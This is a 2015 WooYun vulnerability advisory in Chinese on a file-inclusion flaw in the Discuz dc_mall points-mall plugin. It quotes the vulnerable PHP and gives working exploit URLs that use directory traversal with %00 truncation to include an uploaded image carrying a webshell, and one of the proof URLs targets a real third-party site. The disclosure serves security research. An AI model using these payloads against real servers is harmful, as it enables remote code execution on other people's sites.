当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131386

漏洞标题:discuz某插件设计缺陷可前台getshell(有较强条件限制)

相关厂商:Discuz!

漏洞作者: 路人甲

提交时间:2015-08-04 13:58

修复时间:2015-11-07 14:00

公开时间:2015-11-07 14:00

漏洞类型:文件包含

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-09: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-10-03: 细节向核心白帽子及相关领域专家公开
2015-10-13: 细节向普通白帽子公开
2015-10-23: 细节向实习白帽子公开
2015-11-07: 细节向公众公开

简要描述:

设计缺陷

详细说明:

#discuz积分商城插件任意文件包含(最新版测试)
#插件信息:
http://addon.discuz.com/?@dc_mall.plugin
官方安装量3000+ (已经不少了吧)

图片1.png


图片4.png


关键字搜一下:
#折腾了半天才搞定成功云平台服务。。终于可以装插件了。。。
#测试环境:
PHP 版本为: 5.2.9-2
magic_quotes_gpc = off
#先看看代码吧:
dc_mall.inc.php(漏洞文件)

<?php
if(!defined('IN_DISCUZ')) {
	exit('Access Denied');
}
$_lang = lang('plugin/dc_mall');
$action = $_GET['action'] ? $_GET['action'] : 'index';
$version ='Ver 1.1.1';
$cvar = $_G['cache']['plugin']['dc_mall'];
$file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//action参数未过滤直接传入$file 后面的用%00截断即可包含任意文件
if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action');
$usercredit = getuserprofile('extcredits'.$cvar['credit']);
$mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();
$sortid = dintval($_GET['sortid']);
if(empty($mallnav[$sortid]))$sortid=0;
@include $file;
$croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php';
$cronupdate = @include $croppath;
if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){
	require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php';
	build_cache_plugin_mallinfo();
	$configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";\n\n";
	if($fp = @fopen($croppath, 'wb')) {
		fwrite($fp, "<?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?>");
		fclose($fp);
	}
}
include template('dc_mall:index/'.$action);
?>


#包含测试

图片2.png


#getshell
怎么shell就不用多说了,前台上传带马图片,在直接用包含就成功
www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

图片3.png

漏洞证明:

#http://bbs.medkaoyan.net/plugin.php?action=../../../../../robots.txt%00&id=dc_mall

修复方案:

联系该插件作者

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-07 14:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-18 15:43 | 红糖哥 ( 实习白帽子 | Rank:70 漏洞数:8 | 红糖暖胃不暖逼)

    目测是1314插件的那个后门

  2. 2015-08-24 15:34 | 小白鼠 ( 路人 | Rank:1 漏洞数:1 | 小呀小呀小白鼠)

    报告新的也没啥用,应用市场大了,什么鸟都有!

  3. 2015-08-24 20:40 | scanf ( 核心白帽子 | Rank:1317 漏洞数:191 | 。)

    是包含吗?如果是那个图片的文件名怎么得到的求解.

  4. 2015-08-25 00:12 | Yuku ( 路人 | Rank:21 漏洞数:19 | 酱油哥)

    @scanf discuz上传图片附件你说呢

  5. 2015-08-25 09:54 | scanf ( 核心白帽子 | Rank:1317 漏洞数:191 | 。)

    然而要上传成功了在右键我还没有发帖就右键了.....

  6. 2015-09-07 20:55 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    @小白鼠 @红糖哥 求漏洞详情,邮箱4654602@qq.com

  7. 2015-09-08 12:49 | Yuku ( 路人 | Rank:21 漏洞数:19 | 酱油哥)

    @微尘 插件漏洞而已,你看都忽略了